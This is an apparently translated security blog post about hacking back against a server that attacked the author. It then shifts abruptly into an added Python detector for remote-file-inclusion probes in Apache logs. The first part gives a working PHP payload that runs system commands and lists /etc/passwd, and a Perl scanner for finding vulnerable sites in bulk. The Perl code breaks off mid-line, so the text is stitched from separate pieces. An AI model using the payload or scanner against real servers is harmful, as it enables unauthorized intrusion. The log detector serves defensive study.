Counter-penetration forensics

Source: Internet
Author: User

Reprinted from Xiliaoxixi; final editing: Zero x 255

From: Tiger

I. Cause

One day the IDS raised an alert: Apache was under attack. The attempt did not succeed, but that is no reason to let it pass. I had to see what kind of 'immortal' dared to court trouble on my turf.

II. Counterattack

Scanning the source IP showed only ports 22 and 80 open. So the other side is also a web server, most likely a stepping stone. In any case, take it first!

A web server usually hosts many virtual hosts, which makes it hard to guarantee that the code of every site is secure. So on a server with many websites it is generally easy to get a webshell.

1. Spying

Google, of course, is used to gather information about the websites.

First go to www.myipneighbors.com and look up the domain names that map to the server's IP address;

then use Google to search inurl:domain.com and check the returned pages one by one.

But too many domain names map to this IP address. Judging from the attack method used from that IP, the attacker appeared to be looking for RFI (remote file include) vulnerabilities. OK: if this server is a stepping stone, it was probably also compromised through an RFI vulnerability, so let's start there.

Put all the server URLs collected from Google into a text file; then a program can check these links quickly. Enough talk, on to the code:

1. rfi.txt

This is actually PHP code. It is used to test whether the target website's PHP script will execute it.

<?php
// Through PHP's unpack() function: if 2a73637266637874392a (the hex of the
// marker string) is printed on the page, the PHP code was executed!
$pcode = unpack("H*", "*scrfcxt9*");
echo $pcode[1];
// phpinfo();
echo "<br>";
// Run the command ls /et*/pas*d. If /etc/passwd is returned, the PHP code can
// execute system commands.
echo execute("ls /et*/pas*d");

// The phpspy code is used here, so I was too lazy to write it myself: it tries
// the PHP functions that run system commands one by one and uses the first one
// that works.
function execute($cfe) {
    $res = '';
    if ($cfe) {
        if (function_exists('exec')) {
            @exec($cfe, $res);
            $res = join("", $res);
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif (function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (@is_resource($f = @popen($cfe, "r"))) {
            $res = '';
            while (!@feof($f)) {
                $res .= @fread($f, 1024);
            }
            @pclose($f);
        }
    }
    return $res;
}
?>

2. rfiscan.pl

This is the batch detection code that quickly locates vulnerable URLs.

#!/usr/bin/perl -w
use LWP::Simple;           # use LWP to fetch the URL content and check it
use Parallel::ForkManager; # use ForkManager for fast parallel execution
$| = 1;
my $urlfile = shift || die "need list!";
my @urllist;
my $forkno = 100;
my $count = 0;
# Set the remote file inclusion location
my $phpurl = 'http://www.mysite.com/rfc.txt?';
my $stime = time;
# Open the URL list file
open(URLL, "$urlfile"
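Seen from the server side, both pieces above leave a very recognisable trace: an include parameter whose value is a remote URL, usually ending in a .txt file plus a trailing '?' (or '%00') so that whatever the script appends is swallowed, and a burst of such requests against many different scripts from one address when a batch scanner like rfiscan.pl is run against a host. The following detector is an added example, not code from the article or from phpspy; it parses Apache combined-format access log lines, flags parameter values that look like remote includes, grades them (a bare remote URL alone is only low confidence, since redirect and callback parameters produce the same shape), and reports source addresses that probed several scripts. All log lines, IP addresses and hostnames in it are constructed placeholders.

```python
"""Spot remote-file-inclusion probes in Apache access logs (added example)."""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log lines (not real traffic). 203.0.113.7 plays the
# scanning host, rfi.example.net the host serving the include payload.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=http://rfi.example.net/rfc.txt? HTTP/1.1" 200 512 "-" "libwww-perl/6.05"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /modules/view.php?file=http://rfi.example.net/rfc.txt%3F HTTP/1.1" 200 498 "-" "libwww-perl/6.05"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /inc/header.php?inc=ftp://rfi.example.net/x.txt%00 HTTP/1.1" 404 209 "-" "libwww-perl/6.05"
198.51.100.20 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "https://www.example.com/" "Mozilla/5.0"
198.51.100.21 - - [10/Oct/2023:13:56:05 +0000] "GET /redirect.php?url=https://www.example.com/news HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# URL wrappers PHP will include from when allow_url_include is on.
REMOTE_RE = re.compile(r'^(?:https?|ftps?)://', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one combined-format line, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_indicators(value):
    """Return the RFI indicators present in one (percent-decoded) parameter value."""
    reasons = []
    if not REMOTE_RE.match(value):
        return reasons
    reasons.append("remote_url")
    # A trailing '?' turns whatever the script appends into a query string; an
    # embedded NUL (from '%00') truncates it. Browsers never send either.
    if value.endswith("?") or "\x00" in value:
        reasons.append("include_terminator")
    # Pulling a .txt file through an include parameter is another tell.
    remote_path = urlsplit(value.rstrip("?").split("\x00")[0]).path
    if remote_path.lower().endswith(".txt"):
        reasons.append("text_payload")
    return reasons


def classify(target):
    """Inspect every query parameter of a request target.

    Returns a list of (param, value, severity, reasons). 'high' means a remote
    URL plus an include terminator or .txt payload; 'low' means a bare remote
    URL, which legitimate redirect/callback parameters also produce.
    """
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        reasons = rfi_indicators(value)
        if reasons:
            severity = "high" if len(reasons) > 1 else "low"
            findings.append((name, value, severity, reasons))
    return findings


def analyse(log_text, scan_threshold=3):
    """Scan a whole log and summarise RFI activity per source address."""
    report = {"high": [], "low": [], "per_source": Counter(), "scanners": []}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value, severity, reasons in classify(rec["target"]):
            report[severity].append({
                "ip": rec["ip"], "path": urlsplit(rec["target"]).path,
                "param": name, "value": value, "status": rec["status"],
                "ua": rec["ua"], "reasons": reasons})
            if severity == "high":
                report["per_source"][rec["ip"]] += 1
    # Several distinct scripts probed from one address is the signature of a
    # batch scanner rather than a stray request.
    report["scanners"] = [ip for ip, n in report["per_source"].items()
                          if n >= scan_threshold]
    return report


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for hit in result["high"]:
        print(f'{hit["ip"]} {hit["path"]} {hit["param"]}={hit["value"]!r} '
              f'status={hit["status"]} ua={hit["ua"]} {hit["reasons"]}')
    print("batch scanners:", result["scanners"])
```

Two points worth keeping in mind when running this over real logs. A 200 response to a flagged request only shows the script ran; whether the remote file was actually included depends on PHP's allow_url_include (and allow_url_fopen) settings, so a hit is a reason to check those settings and the included URL, not proof of compromise by itself. And the low-severity bucket exists precisely because a remote URL in a parameter is common in benign redirect code; review it separately rather than alerting on it.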
